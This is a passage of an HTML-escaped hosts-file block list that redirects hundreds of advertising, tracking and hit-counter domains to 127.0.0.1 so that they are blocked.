/&gt;127.0.0.1 affiliate.dtiserv.com&lt;br /&gt;127.0.0.1 affiliate.gamestop.com&lt;br /&gt;127.0.0.1 affiliate.grasscity.com&lt;br /&gt;127.0.0.1 affiliate.travelnow.com&lt;br /&gt;127.0.0.1 affiliate.viator.com&lt;br /&gt;127.0.0.1 affiliatefuel.com&lt;br /&gt;127.0.0.1 affiliates.allposters.com&lt;br /&gt;127.0.0.1 affiliates.internationaljock.com&lt;br /&gt;127.0.0.1 affiliatetracking.net&lt;br /&gt;127.0.0.1 affiliplus.de&lt;br /&gt;127.0.0.1 afiliados.submarino.com.br&lt;br /&gt;127.0.0.1 ah-ha.com&lt;br /&gt;127.0.0.1 aim4media.com&lt;br /&gt;127.0.0.1 alladvantage.com&lt;br /&gt;127.0.0.1 amedia.techies.com&lt;br /&gt;127.0.0.1 app.lstdesign.com&lt;br /&gt;127.0.0.1 arc1.msn.com&lt;br /&gt;127.0.0.1 as.cmpnet.com&lt;br /&gt;127.0.0.1 as.fotexnet.hu&lt;br /&gt;127.0.0.1 as1.falkag.de&lt;br /&gt;127.0.0.1 as2.falkag.de&lt;br /&gt;127.0.0.1 as3.falkag.de&lt;br /&gt;127.0.0.1 as4.falkag.de&lt;br /&gt;127.0.0.1 as5000.com&lt;br /&gt;127.0.0.1 asv.gameplanet.co.nz&lt;br /&gt;127.0.0.1 atdmt.com&lt;br /&gt;127.0.0.1 atwola.com&lt;br /&gt;127.0.0.1 audit.median.hu&lt;br /&gt;127.0.0.1 audit.webinform.hu&lt;br /&gt;127.0.0.1 autohits.dk&lt;br /&gt;127.0.0.1 avatarresources.com&lt;br /&gt;127.0.0.1 avenuea.com&lt;br /&gt;127.0.0.1 avres.net&lt;br /&gt;127.0.0.1 awarez.net&lt;br /&gt;127.0.0.1 awrz.net&lt;br /&gt;127.0.0.1 azjmp.com&lt;br /&gt;127.0.0.1 azoogleads.com&lt;br /&gt;127.0.0.1 babs.tv2.dk&lt;br /&gt;127.0.0.1 backbeatmedia.com&lt;br /&gt;127.0.0.1 banerovec.cz&lt;br /&gt;127.0.0.1 banex.cz&lt;br /&gt;127.0.0.1 banik.redigy.cz&lt;br /&gt;127.0.0.1 banman.cz&lt;br /&gt;127.0.0.1 banner.ad.nu&lt;br /&gt;127.0.0.1 banner.buempliz-online.ch&lt;br /&gt;127.0.0.1 banner.casino.net&lt;br /&gt;127.0.0.1 banner.casinodelrio.com&lt;br /&gt;127.0.0.1 banner.coza.com&lt;br /&gt;127.0.0.1 banner.cz&lt;br /&gt;127.0.0.1 banner.easyspace.com&lt;br /&gt;127.0.0.1 banner.elisa.net&lt;br /&gt;127.0.0.1 banner.getgo.de&lt;br /&gt;127.0.0.1 banner.img.co.za&lt;br /&gt;127.0.0.1 banner.inyourpocket.com&lt;br /&gt;127.0.0.1 banner.jobsahead.com&lt;br /&gt;127.0.0.1 banner.kiev.ua&lt;br /&gt;127.0.0.1 banner.linux.se&lt;br /&gt;127.0.0.1 banner.media-system.de&lt;br /&gt;127.0.0.1 banner.mindshare.de&lt;br /&gt;127.0.0.1 banner.musikmedia.de&lt;br /&gt;127.0.0.1 banner.nixnet.cz&lt;br /&gt;127.0.0.1 banner.noblepoker.com&lt;br /&gt;127.0.0.1 banner.northsky.com&lt;br /&gt;127.0.0.1 banner.orb.net&lt;br /&gt;127.0.0.1 banner.penguin.cz&lt;br /&gt;127.0.0.1 banner.relcom.ru&lt;br /&gt;127.0.0.1 banner.rojakpot.com&lt;br /&gt;127.0.0.1 banner.t-online.de&lt;br /&gt;127.0.0.1 banner.tanto.de&lt;br /&gt;127.0.0.1 banner.tpage.com&lt;br /&gt;127.0.0.1 banner.webmersion.com&lt;br /&gt;127.0.0.1 banner4all.dk&lt;br /&gt;127.0.0.1 bannerads.de&lt;br /&gt;127.0.0.1 bannerads.zwire.com&lt;br /&gt;127.0.0.1 bannerbank.ru&lt;br /&gt;127.0.0.1 bannerbox.hu&lt;br /&gt;127.0.0.1 bannerboxes.com&lt;br /&gt;127.0.0.1 bannercommunity.de&lt;br /&gt;127.0.0.1 bannerexchange.cjb.net&lt;br /&gt;127.0.0.1 bannerhost.com&lt;br /&gt;127.0.0.1 bannerhosts.com&lt;br /&gt;127.0.0.1 bannerimage.com&lt;br /&gt;127.0.0.1 bannerlandia.com.ar&lt;br /&gt;127.0.0.1 bannermall.com&lt;br /&gt;127.0.0.1 bannermarkt.nl&lt;br /&gt;127.0.0.1 bannerpower.com&lt;br /&gt;127.0.0.1 banners.adultfriendfinder.com&lt;br /&gt;127.0.0.1 banners.amigos.com&lt;br /&gt;127.0.0.1 banners.arachne.cz&lt;br /&gt;127.0.0.1 banners.asiafriendfinder.com&lt;br /&gt;127.0.0.1 banners.babylon-x.com&lt;br /&gt;127.0.0.1 banners.babylonbucks.com&lt;br /&gt;127.0.0.1 banners.bol.com.br&lt;br /&gt;127.0.0.1 banners.clubseventeen.com&lt;br /&gt;127.0.0.1 banners.czi.cz&lt;br /&gt;127.0.0.1 banners.de.clara.net&lt;br /&gt;127.0.0.1 banners.directnic.com&lt;br /&gt;127.0.0.1 banners.dot.tk&lt;br /&gt;127.0.0.1 banners.easydns.com&lt;br /&gt;127.0.0.1 banners.ebay.com&lt;br /&gt;127.0.0.1 banners.freett.com&lt;br /&gt;127.0.0.1 banners.friendfinder.com&lt;br /&gt;127.0.0.1 banners.friendsfinder.com&lt;br /&gt;127.0.0.1 banners.hetnet.nl&lt;br /&gt;127.0.0.1 banners.internetsexprovider.com&lt;br /&gt;127.0.0.1 banners.iq.pl&lt;br /&gt;127.0.0.1 banners.isoftmarketing.com&lt;br /&gt;127.0.0.1 banners.kfmb.com&lt;br /&gt;127.0.0.1 banners.lifeserv.com&lt;br /&gt;127.0.0.1 banners.linkbuddies.com&lt;br /&gt;127.0.0.1 banners.netcraft.com&lt;br /&gt;127.0.0.1 banners.one2one.com&lt;br /&gt;127.0.0.1 banners.resultonline.com&lt;br /&gt;127.0.0.1 banners.sexsearch.com&lt;br /&gt;127.0.0.1 banners.tucson.com&lt;br /&gt;127.0.0.1 banners.uk.clara.net&lt;br /&gt;127.0.0.1 banners.wunderground.com&lt;br /&gt;127.0.0.1 bannerserver.com&lt;br /&gt;127.0.0.1 bannerserver.gator.com&lt;br /&gt;127.0.0.1 bannersgomlm.com&lt;br /&gt;127.0.0.1 bannersng.yell.com&lt;br /&gt;127.0.0.1 bannerspace.com&lt;br /&gt;127.0.0.1 bannerswap.com&lt;br /&gt;127.0.0.1 bannertesting.com&lt;br /&gt;127.0.0.1 bannieres.acces-contenu.com&lt;br /&gt;127.0.0.1 bans.bride.ru&lt;br /&gt;127.0.0.1 bansrv1.n1media.com&lt;br /&gt;127.0.0.1 barnesandnoble.bfast.com&lt;br /&gt;127.0.0.1 bbmedia.cz&lt;br /&gt;127.0.0.1 bbn.img.com.ua&lt;br /&gt;127.0.0.1 bestsearch.net&lt;br /&gt;127.0.0.1 bidclix.com&lt;br /&gt;127.0.0.1 bidclix.net&lt;br /&gt;127.0.0.1 bigads.guj.de&lt;br /&gt;127.0.0.1 bigbangmedia.com&lt;br /&gt;127.0.0.1 billboard.cz&lt;br /&gt;127.0.0.1 bizad.nikkeibp.co.jp&lt;br /&gt;127.0.0.1 bizban.net&lt;br /&gt;127.0.0.1 blast4traffic.com&lt;br /&gt;127.0.0.1 blazefind.com&lt;br /&gt;127.0.0.1 blogads.com&lt;br /&gt;127.0.0.1 bluehavenmedia.com&lt;br /&gt;127.0.0.1 bluestreak.com&lt;br /&gt;127.0.0.1 bm.annonce.cz&lt;br /&gt;127.0.0.1 bn.bfast.com&lt;br /&gt;127.0.0.1 bnr.volgocity.ru&lt;br /&gt;127.0.0.1 boom.ro&lt;br /&gt;127.0.0.1 bpath.com&lt;br /&gt;127.0.0.1 bravenet.com&lt;br /&gt;127.0.0.1 bridgetrack.com&lt;br /&gt;127.0.0.1 british-banners.com&lt;br /&gt;127.0.0.1 bs.yandex.ru&lt;br /&gt;127.0.0.1 bs001.gmx.net&lt;br /&gt;127.0.0.1 bs002.gmx.net&lt;br /&gt;127.0.0.1 bs003.gmx.net&lt;br /&gt;127.0.0.1 bs004.gmx.net&lt;br /&gt;127.0.0.1 bs005.gmx.net&lt;br /&gt;127.0.0.1 bs006.gmx.net&lt;br /&gt;127.0.0.1 bs007.gmx.net&lt;br /&gt;127.0.0.1 bs008.gmx.net&lt;br /&gt;127.0.0.1 bs009.gmx.net&lt;br /&gt;127.0.0.1 bs010.gmx.net&lt;br /&gt;127.0.0.1 bs011.gmx.net&lt;br /&gt;127.0.0.1 bs012.gmx.net&lt;br /&gt;127.0.0.1 bs013.gmx.net&lt;br /&gt;127.0.0.1 bs014.gmx.net&lt;br /&gt;127.0.0.1 bs015.gmx.net&lt;br /&gt;127.0.0.1 bs016.gmx.net&lt;br /&gt;127.0.0.1 bs017.gmx.net&lt;br /&gt;127.0.0.1 bs018.gmx.net&lt;br /&gt;127.0.0.1 bs019.gmx.net&lt;br /&gt;127.0.0.1 bs020.gmx.net&lt;br /&gt;127.0.0.1 bs021.gmx.net&lt;br /&gt;127.0.0.1 bs022.gmx.net&lt;br /&gt;127.0.0.1 bs023.gmx.net&lt;br /&gt;127.0.0.1 bs024.gmx.net&lt;br /&gt;127.0.0.1 bs025.gmx.net&lt;br /&gt;127.0.0.1 bs026.gmx.net&lt;br /&gt;127.0.0.1 bs027.gmx.net&lt;br /&gt;127.0.0.1 bs028.gmx.net&lt;br /&gt;127.0.0.1 bs029.gmx.net&lt;br /&gt;127.0.0.1 bs030.gmx.net&lt;br /&gt;127.0.0.1 bs031.gmx.net&lt;br /&gt;127.0.0.1 bs032.gmx.net&lt;br /&gt;127.0.0.1 bs033.gmx.net&lt;br /&gt;127.0.0.1 bs034.gmx.net&lt;br /&gt;127.0.0.1 bs035.gmx.net&lt;br /&gt;127.0.0.1 bs036.gmx.net&lt;br /&gt;127.0.0.1 bs037.gmx.net&lt;br /&gt;127.0.0.1 bs038.gmx.net&lt;br /&gt;127.0.0.1 bs039.gmx.net&lt;br /&gt;127.0.0.1 bs040.gmx.net&lt;br /&gt;127.0.0.1 bs041.gmx.net&lt;br /&gt;127.0.0.1 bs042.gmx.net&lt;br /&gt;127.0.0.1 bs043.gmx.net&lt;br /&gt;127.0.0.1 bs044.gmx.net&lt;br /&gt;127.0.0.1 bs045.gmx.net&lt;br /&gt;127.0.0.1 bs046.gmx.net&lt;br /&gt;127.0.0.1 bs047.gmx.net&lt;br /&gt;127.0.0.1 bs048.gmx.net&lt;br /&gt;127.0.0.1 bs049.gmx.net&lt;br /&gt;127.0.0.1 budsinc.com&lt;br /&gt;127.0.0.1 burstnet.akadns.net&lt;br /&gt;127.0.0.1 burstnet.com&lt;br /&gt;127.0.0.1 businessfactory.prospero.com&lt;br /&gt;127.0.0.1 c.bigmir.net&lt;br /&gt;127.0.0.1 c1.nowlinux.com&lt;br /&gt;127.0.0.1 candidclicks.com&lt;br /&gt;127.0.0.1 casalemedia.com&lt;br /&gt;127.0.0.1 casalmedia.com&lt;br /&gt;127.0.0.1 cash4banner.com&lt;br /&gt;127.0.0.1 cash4banner.de&lt;br /&gt;127.0.0.1 cash4popup.de&lt;br /&gt;127.0.0.1 cashfiesta.com&lt;br /&gt;127.0.0.1 cashpartner.com&lt;br /&gt;127.0.0.1 cashpartner.net&lt;br /&gt;127.0.0.1 casinogames.com&lt;br /&gt;127.0.0.1 casinorewards.com&lt;br /&gt;127.0.0.1 casinotraffic.com&lt;br /&gt;127.0.0.1 casinotreasure.com&lt;br /&gt;127.0.0.1 cat.clx.ru&lt;br /&gt;127.0.0.1 cben1.net&lt;br /&gt;127.0.0.1 cbx.net&lt;br /&gt;127.0.0.1 cdn2.adsdk.com&lt;br /&gt;127.0.0.1 centrport.net&lt;br /&gt;127.0.0.1 cgicounter.puretec.de&lt;br /&gt;127.0.0.1 ch.questionmarket.com&lt;br /&gt;127.0.0.1 chart.dk&lt;br /&gt;127.0.0.1 checkm8.com&lt;br /&gt;127.0.0.1 chestionar.ro&lt;br /&gt;127.0.0.1 ciaoclick.com&lt;br /&gt;127.0.0.1 cibleclick.com&lt;br /&gt;127.0.0.1 cityads.telus.net&lt;br /&gt;127.0.0.1 cj.com&lt;br /&gt;127.0.0.1 cjbmanagement.com&lt;br /&gt;127.0.0.1 claria.com&lt;br /&gt;127.0.0.1 click-fr.com&lt;br /&gt;127.0.0.1 click.absoluteagency.com&lt;br /&gt;127.0.0.1 click.fool.co.uk&lt;br /&gt;127.0.0.1 click.fool.com&lt;br /&gt;127.0.0.1 click.go2net.com&lt;br /&gt;127.0.0.1 click2freemoney.com&lt;br /&gt;127.0.0.1 click2paid.com&lt;br /&gt;127.0.0.1 click4click.com&lt;br /&gt;127.0.0.1 clickability.com&lt;br /&gt;127.0.0.1 clickagents.com&lt;br /&gt;127.0.0.1 clickbank.com&lt;br /&gt;127.0.0.1 clickbank.net&lt;br /&gt;127.0.0.1 clickbroker.com&lt;br /&gt;127.0.0.1 clickbrokers.com&lt;br /&gt;127.0.0.1 clickcash.webpower.com&lt;br /&gt;127.0.0.1 clickedyclick.com&lt;br /&gt;127.0.0.1 clickfinders.com&lt;br /&gt;127.0.0.1 clickforwebmasters.com&lt;br /&gt;127.0.0.1 clickhere.foronlinegames.com&lt;br /&gt;127.0.0.1 clickhereforcellphones.com&lt;br /&gt;127.0.0.1 clickhouse.com&lt;br /&gt;127.0.0.1 clickhype.com&lt;br /&gt;127.0.0.1 clickmedia.ro&lt;br /&gt;127.0.0.1 clicks.equantum.com&lt;br /&gt;127.0.0.1 clicks.jackpot.com&lt;br /&gt;127.0.0.1 clicks.mods.de&lt;br /&gt;127.0.0.1 clicks.stripsaver.com&lt;br /&gt;127.0.0.1 clickserve.cc-dt.com&lt;br /&gt;127.0.0.1 clicksor.com&lt;br /&gt;127.0.0.1 clickthrutraffic.com&lt;br /&gt;127.0.0.1 clicktracks.com&lt;br /&gt;127.0.0.1 clicktrade.com&lt;br /&gt;127.0.0.1 clickxchange.com&lt;br /&gt;127.0.0.1 clickz.com&lt;br /&gt;127.0.0.1 clictrafic.com&lt;br /&gt;127.0.0.1 clients.tbo.com&lt;br /&gt;127.0.0.1 clixgalore.com&lt;br /&gt;127.0.0.1 cnt.one.ru&lt;br /&gt;127.0.0.1 cnt1.pocitadlo.cz&lt;br /&gt;127.0.0.1 code-server.biz&lt;br /&gt;127.0.0.1 colonize.com&lt;br /&gt;127.0.0.1 comclick.com&lt;br /&gt;127.0.0.1 commission-junction.com&lt;br /&gt;127.0.0.1 commissionmonster.com&lt;br /&gt;127.0.0.1 commonname.com&lt;br /&gt;127.0.0.1 compactbanner.com&lt;br /&gt;127.0.0.1 comprabanner.it&lt;br /&gt;127.0.0.1 contextclick.com&lt;br /&gt;127.0.0.1 cookies.cmpnet.com&lt;br /&gt;127.0.0.1 cornflakes.pathfinder.com&lt;br /&gt;127.0.0.1 count.rin.ru&lt;br /&gt;127.0.0.1 counted.com&lt;br /&gt;127.0.0.1 counter.bloke.com&lt;br /&gt;127.0.0.1 counter.cnw.cz&lt;br /&gt;127.0.0.1 counter.cz&lt;br /&gt;127.0.0.1 counter.nowlinux.com&lt;br /&gt;127.0.0.1 counter.rambler.ru&lt;br /&gt;127.0.0.1 counter.search.bg&lt;br /&gt;127.0.0.1 counter.times.lv&lt;br /&gt;127.0.0.1 counter.webtrends.net&lt;br /&gt;127.0.0.1 counter.yadro.ru&lt;br /&gt;127.0.0.1 counters.honesty.com&lt;br /&gt;127.0.0.1 counts.tucows.com&lt;br /&gt;127.0.0.1 coupling-media.de&lt;br /&gt;127.0.0.1 crazypopups.com&lt;br /&gt;127.0.0.1 creative.whi.co.nz&lt;br /&gt;127.0.0.1 creatives.as4x.tmcs.net&lt;br /&gt;127.0.0.1 cserver.mii.instacontent.net&lt;br /&gt;127.0.0.1 ctnetwork.hu&lt;br /&gt;127.0.0.1 ctxtads.overture.com&lt;br /&gt;127.0.0.1 custom-click.com&lt;br /&gt;127.0.0.1 customad.cnn.com&lt;br /&gt;127.0.0.1 cyberbounty.com&lt;br /&gt;127.0.0.1 cybercount.com&lt;br /&gt;127.0.0.1 cybereps.com&lt;br /&gt;127.0.0.1 cybermonitor.com&lt;br /&gt;127.0.0.1 cydoor.com&lt;br /&gt;127.0.0.1 datingadvertising.com&lt;br /&gt;127.0.0.1 dbbsrv.com&lt;br /&gt;127.0.0.1 dcad.tnn.net&lt;br /&gt;127.0.0.1 dclk.net&lt;br /&gt;127.0.0.1 de.rottentomatoes.com&lt;br /&gt;127.0.0.1 dealhelper.com&lt;br /&gt;127.0.0.1 default-homepage-network.com&lt;br /&gt;127.0.0.1 deloo.de&lt;br /&gt;127.0.0.1 desktop.kazaa.com&lt;br /&gt;127.0.0.1 dgm2.com&lt;br /&gt;127.0.0.1 dgmaustralia.com&lt;br /&gt;127.0.0.1 dialerporn.com&lt;br /&gt;127.0.0.1 didtheyreadit.com&lt;br /&gt;127.0.0.1 digits.com&lt;br /&gt;127.0.0.1 direct-revenue.com&lt;br /&gt;127.0.0.1 direct.lbe.ru&lt;br /&gt;127.0.0.1 directleads.com&lt;br /&gt;127.0.0.1 directtrack.com&lt;br /&gt;127.0.0.1 directwebsearch.net&lt;br /&gt;127.0.0.1 discountclick.com&lt;br /&gt;127.0.0.1 divicash.com&lt;br /&gt;127.0.0.1 dnads.directnic.com&lt;br /&gt;127.0.0.1 domainsponsor.com&lt;br /&gt;127.0.0.1 domainsteam.de&lt;br /&gt;127.0.0.1 doubleclic.com&lt;br /&gt;127.0.0.1 doubleclick.com&lt;br /&gt;127.0.0.1 doubleclick.de&lt;br /&gt;127.0.0.1 doubleclick.net&lt;br /&gt;127.0.0.1 drinkmy.com&lt;br /&gt;127.0.0.1 dw.com.com&lt;br /&gt;127.0.0.1 e-bannerx.com&lt;br /&gt;127.0.0.1 e2give.com&lt;br /&gt;127.0.0.1 eadexchange.com&lt;br /&gt;127.0.0.1 eads.com&lt;br /&gt;127.0.0.1 ecoupons.com&lt;br /&gt;127.0.0.1 elitetoplist.com&lt;br /&gt;127.0.0.1 emarketer.com&lt;br /&gt;127.0.0.1 emarketmakers.com&lt;br /&gt;127.0.0.1 engage.everyone.net&lt;br /&gt;127.0.0.1 engage.omaha.com&lt;br /&gt;127.0.0.1 engine.awaps.net&lt;br /&gt;127.0.0.1 engine.espace.netavenir.com&lt;br /&gt;127.0.0.1 enginenetwork.com&lt;br /&gt;127.0.0.1 entercasino.com&lt;br /&gt;127.0.0.1 erotic-ad.com&lt;br /&gt;127.0.0.1 escati.linkopp.net&lt;br /&gt;127.0.0.1 eshopads2.com&lt;br /&gt;127.0.0.1 espotting.com&lt;br /&gt;127.0.0.1 estats.com&lt;br /&gt;127.0.0.1 etracker.de&lt;br /&gt;127.0.0.1 eu-adcenter.net&lt;br /&gt;127.0.0.1 euniverseads.com&lt;br /&gt;127.0.0.1 euro4banner.com&lt;br /&gt;127.0.0.1 europeanbanners.com&lt;br /&gt;127.0.0.1 euros4click.de&lt;br /&gt;127.0.0.1 eusta.de&lt;br /&gt;127.0.0.1 exchange-it.com&lt;br /&gt;127.0.0.1 exchange.bg&lt;br /&gt;127.0.0.1 exchangead.com&lt;br /&gt;127.0.0.1 exchangeclicksonline.com&lt;br /&gt;127.0.0.1 exit76.com&lt;br /&gt;127.0.0.1 exitexchange.com&lt;br /&gt;127.0.0.1 exitfuel.com&lt;br /&gt;127.0.0.1 ext4.price.ru&lt;br /&gt;127.0.0.1 extreme-dm.com&lt;br /&gt;127.0.0.1 eyeblaster-bs.com&lt;br /&gt;127.0.0.1 eyeblaster.com&lt;br /&gt;127.0.0.1 eyewonder.com&lt;br /&gt;127.0.0.1 ezula.com&lt;br /&gt;127.0.0.1 f1organizer.com&lt;br /&gt;127.0.0.1 falkag.de&lt;br /&gt;127.0.0.1 falkag.net&lt;br /&gt;127.0.0.1 fast-adv.it&lt;br /&gt;127.0.0.1 fastclick.com&lt;br /&gt;127.0.0.1 fastclick.com.edgesuite.net&lt;br /&gt;127.0.0.1 fastclick.net&lt;br /&gt;127.0.0.1 fastcounter.bcentral.com&lt;br /&gt;127.0.0.1 feedbackresearch.com&lt;br /&gt;127.0.0.1 ffxcam.fairfax.com.au&lt;br /&gt;127.0.0.1 findcommerce.com&lt;br /&gt;127.0.0.1 findyourcasino.com&lt;br /&gt;127.0.0.1 fineclicks.com&lt;br /&gt;127.0.0.1 first.nova.cz&lt;br /&gt;127.0.0.1 flexbanner.com&lt;br /&gt;127.0.0.1 flowgo.com&lt;br /&gt;127.0.0.1 fmads.osdn.com&lt;br /&gt;127.0.0.1 focalex.com&lt;br /&gt;127.0.0.1 fragmentserv.iac-online.de&lt;br /&gt;127.0.0.1 free-banners.com&lt;br /&gt;127.0.0.1 freebanner.com&lt;br /&gt;127.0.0.1 freelogs.com&lt;br /&gt;127.0.0.1 freestat.pl&lt;br /&gt;127.0.0.1 freestats.com&lt;br /&gt;127.0.0.1 freewebcounter.com&lt;br /&gt;127.0.0.1 *BLEEP*-access.com&lt;br /&gt;127.0.0.1 g-wizzads.net&lt;br /&gt;127.0.0.1 galaxien.com&lt;br /&gt;127.0.0.1 gamblingbanner.com&lt;br /&gt;127.0.0.1 gamehouse.com&lt;br /&gt;127.0.0.1 gator.com&lt;br /&gt;127.0.0.1 gcads.osdn.com&lt;br /&gt;127.0.0.1 gcirm.californianonline.com&lt;br /&gt;127.0.0.1 gemius.pl&lt;br /&gt;127.0.0.1 giftsky.org&lt;br /&gt;127.0.0.1 globaltrack.com&lt;br /&gt;127.0.0.1 go-clicks.de&lt;br /&gt;127.0.0.1 goingplatinum.com&lt;br /&gt;127.0.0.1 gold.weborama.fr&lt;br /&gt;127.0.0.1 goldstats.com&lt;br /&gt;127.0.0.1 googlesyndication.com&lt;br /&gt;127.0.0.1 gorillanation.com&lt;br /&gt;127.0.0.1 gostats.com&lt;br /&gt;127.0.0.1 gp.dejanews.com&lt;br /&gt;127.0.0.1 grafstat.ro&lt;br /&gt;127.0.0.1 herbalaffiliateprogram.com&lt;br /&gt;127.0.0.1 hexusads.fluent.ltd.uk&lt;br /&gt;127.0.0.1 hightrafficads.com&lt;br /&gt;127.0.0.1 hit.bg&lt;br /&gt;127.0.0.1 hit.gemius.pl&lt;br /&gt;127.0.0.1 hit.webcentre.lycos.co.uk&lt;br /&gt;127.0.0.1 hitbox.com&lt;br /&gt;127.0.0.1 hitcents.com&lt;br /&gt;127.0.0.1 hitexchange.net&lt;br /&gt;127.0.0.1 hitfarm.com&lt;br /&gt;127.0.0.1 hitlist.ru&lt;br /&gt;127.0.0.1 hitlogger.com&lt;br /&gt;127.0.0.1 hitlounge.com&lt;br /&gt;127.0.0.1 hitometer.com&lt;br /&gt;127.0.0.1 hits4me.com&lt;br /&gt;127.0.0.1 hitslink.com&lt;br /&gt;127.0.0.1 hotlog.ru&lt;br /&gt;127.0.0.1 hotrank.com.tw&lt;br /&gt;127.0.0.1 hotstatistics.com&lt;br /&gt;127.0.0.1 httpads.com&lt;br /&gt;127.0.0.1 httpool.com&lt;br /&gt;127.0.0.1 humanclick.com&lt;br /&gt;127.0.0.1 hurricanedigitalmedia.com&lt;br /&gt;127.0.0.1 hyperbanner.net&lt;br /&gt;127.0.0.1 hypercount.com&lt;br /&gt;127.0.0.1 i-clicks.net&lt;br /&gt;127.0.0.1 i1img.com&lt;br /&gt;127.0.0.1 iad.liveperson.net&lt;br /&gt;127.0.0.1 iadnet.com&lt;br /&gt;127.0.0.1 idot.cz&lt;br /&gt;127.0.0.1 igads.no.publicus.com&lt;br /&gt;127.0.0.1 ilbanner.com&lt;br /&gt;127.0.0.1 ilead.itrack.it&lt;br /&gt;127.0.0.1 iliillliO00OO0.321.cn&lt;br /&gt;127.0.0.1 image.ugo.com&lt;br /&gt;127.0.0.1 imageads.canoe.ca&lt;br /&gt;127.0.0.1 images.v3.com&lt;br /&gt;127.0.0.1 imaginemedia.com&lt;br /&gt;127.0.0.1 img.bannersxchange.com&lt;br /&gt;127.0.0.1 imonitor.nethost.cz&lt;br /&gt;127.0.0.1 imprese.cz&lt;br /&gt;127.0.0.1 impressionz.co.uk&lt;br /&gt;127.0.0.1 imrworldwide.com&lt;br /&gt;127.0.0.1 inboxdollars.com&lt;br /&gt;127.0.0.1 inc.com&lt;br /&gt;127.0.0.1 indieclick.com&lt;br /&gt;127.0.0.1 industrybrains.com&lt;br /&gt;127.0.0.1 inet-traffic.com&lt;br /&gt;127.0.0.1 infinite-ads.com&lt;br /&gt;127.0.0.1 information.com&lt;br /&gt;127.0.0.1 insightexpress.com&lt;br /&gt;127.0.0.1 instacontent.net&lt;br /&gt;127.0.0.1 instantmadness.com&lt;br /&gt;127.0.0.1 intelliads.com&lt;br /&gt;127.0.0.1 intellitxt.com&lt;br /&gt;127.0.0.1 internet-optimizer.com&lt;br /&gt;127.0.0.1 internetfuel.com&lt;br /&gt;127.0.0.1 interreklame.de&lt;br /&gt;127.0.0.1 ip.ro&lt;br /&gt;127.0.0.1 ireklama.cz&lt;br /&gt;127.0.0.1 is.casalemedia.com&lt;br /&gt;127.0.0.1 itadnetwork.co.uk&lt;br /&gt;127.0.0.1 itbannerexchange.com&lt;br /&gt;127.0.0.1 itfarm.com&lt;br /&gt;127.0.0.1 itop.cz&lt;br /&gt;127.0.0.1 iwin.com&lt;br /&gt;127.0.0.1 j.2004cms.com&lt;br /&gt;127.0.0.1 jbeet.cjt1.net&lt;br /&gt;127.0.0.1 jcontent.bns1.net&lt;br /&gt;127.0.0.1 jcount.com&lt;br /&gt;127.0.0.1 jedonkey.cjt1.net&lt;br /&gt;127.0.0.1 jinisearch.co.uk&lt;br /&gt;127.0.0.1 jkazaa.cjt1.net&lt;br /&gt;127.0.0.1 jnova.cjt1.net&lt;br /&gt;127.0.0.1 joetec.net&lt;br /&gt;127.0.0.1 jokedollars.com&lt;br /&gt;127.0.0.1 justwebads.com&lt;br /&gt;127.0.0.1 kanoodle.com&lt;br /&gt;127.0.0.1 kliks.nl&lt;br /&gt;127.0.0.1 klipads.dvlabs.com&lt;br /&gt;127.0.0.1 kliptracker.com&lt;br /&gt;127.0.0.1 klix.cz&lt;br /&gt;127.0.0.1 labeldaily.com&lt;br /&gt;127.0.0.1 laih.com&lt;br /&gt;127.0.0.1 lbn.ru&lt;br /&gt;127.0.0.1 leadingedgecash.com&lt;br /&gt;127.0.0.1 lightningcast.net&lt;br /&gt;127.0.0.1 lightspeedcash.com&lt;br /&gt;127.0.0.1 link4ads.com&lt;br /&gt;127.0.0.1 linkbuddies.com&lt;br /&gt;127.0.0.1 linkexchange.com&lt;br /&gt;127.0.0.1 linkexchange.ru&lt;br /&gt;127.0.0.1 linkprice.com&lt;br /&gt;127.0.0.1 linkreferral.com&lt;br /&gt;127.0.0.1 linksponsor.com&lt;br /&gt;127.0.0.1 linkswaper.com&lt;br /&gt;127.0.0.1 linksynergy.com&lt;br /&gt;127.0.0.1 liquidad.narrowcastmedia.com&lt;br /&gt;127.0.0.1 lnads.osdn.com&lt;br /&gt;127.0.0.1 log.btopenworld.com&lt;br /&gt;127.0.0.1 log.go.com&lt;br /&gt;127.0.0.1 logging.to&lt;br /&gt;127.0.0.1 logs.erasmas.com&lt;br /&gt;127.0.0.1 look2me.com&lt;br /&gt;127.0.0.1 lop.com&lt;br /&gt;127.0.0.1 lstat.susanin.com&lt;br /&gt;127.0.0.1 m.doubleclick.net&lt;br /&gt;127.0.0.1 mads.gamespot.com&lt;br /&gt;127.0.0.1 mainos2.mtv3.fi&lt;br /&gt;127.0.0.1 marketbanker.com&lt;br /&gt;127.0.0.1 marketing.centrebet.com&lt;br /&gt;127.0.0.1 marketing.nyi.com&lt;br /&gt;127.0.0.1 marketing.nyi.net&lt;br /&gt;127.0.0.1 marketscore.com&lt;br /&gt;127.0.0.1 mastermind.com&lt;br /&gt;127.0.0.1 masterstats.com&lt;br /&gt;127.0.0.1 matchcraft.com&lt;br /&gt;127.0.0.1 maximumcash.com&lt;br /&gt;127.0.0.1 maxserving.com&lt;br /&gt;127.0.0.1 mbuyu.nl&lt;br /&gt;127.0.0.1 media-adrunner.mycomputer.com&lt;br /&gt;127.0.0.1 media-motor.net&lt;br /&gt;127.0.0.1 media.bigstep.com&lt;br /&gt;127.0.0.1 media.ftv-publicite.fr&lt;br /&gt;127.0.0.1 mediacharger.com&lt;br /&gt;127.0.0.1 mediadvertising.ro&lt;br /&gt;127.0.0.1 mediageneral.com&lt;br /&gt;127.0.0.1 mediamgr.ugo.com&lt;br /&gt;127.0.0.1 mediaplazza.com&lt;br /&gt;127.0.0.1 mediaplex.com&lt;br /&gt;127.0.0.1 mediascale.de&lt;br /&gt;127.0.0.1 mediavantage.de&lt;br /&gt;127.0.0.1 megacash.de&lt;br /&gt;127.0.0.1 megago.com&lt;br /&gt;127.0.0.1 megawerbung.de&lt;br /&gt;127.0.0.1 memorix.sdv.fr&lt;br /&gt;127.0.0.1 metaad.econet.hu&lt;br /&gt;127.0.0.1 metrics.webcriteria.net&lt;br /&gt;127.0.0.1 microstatic.pl&lt;br /&gt;127.0.0.1 microticker.com&lt;br /&gt;127.0.0.1 mindseti.com&lt;br /&gt;127.0.0.1 mirror.qkimg.net&lt;br /&gt;127.0.0.1 mjxads.internet.com&lt;br /&gt;127.0.0.1 mkt.cz&lt;br /&gt;127.0.0.1 mojobucks.com&lt;br /&gt;127.0.0.1 monsterpops.com&lt;br /&gt;127.0.0.1 mostcash.com&lt;br /&gt;127.0.0.1 ms-links.com&lt;br /&gt;127.0.0.1 msads.net&lt;br /&gt;127.0.0.1 mtree.com&lt;br /&gt;127.0.0.1 multi1.rmuk.co.uk&lt;br 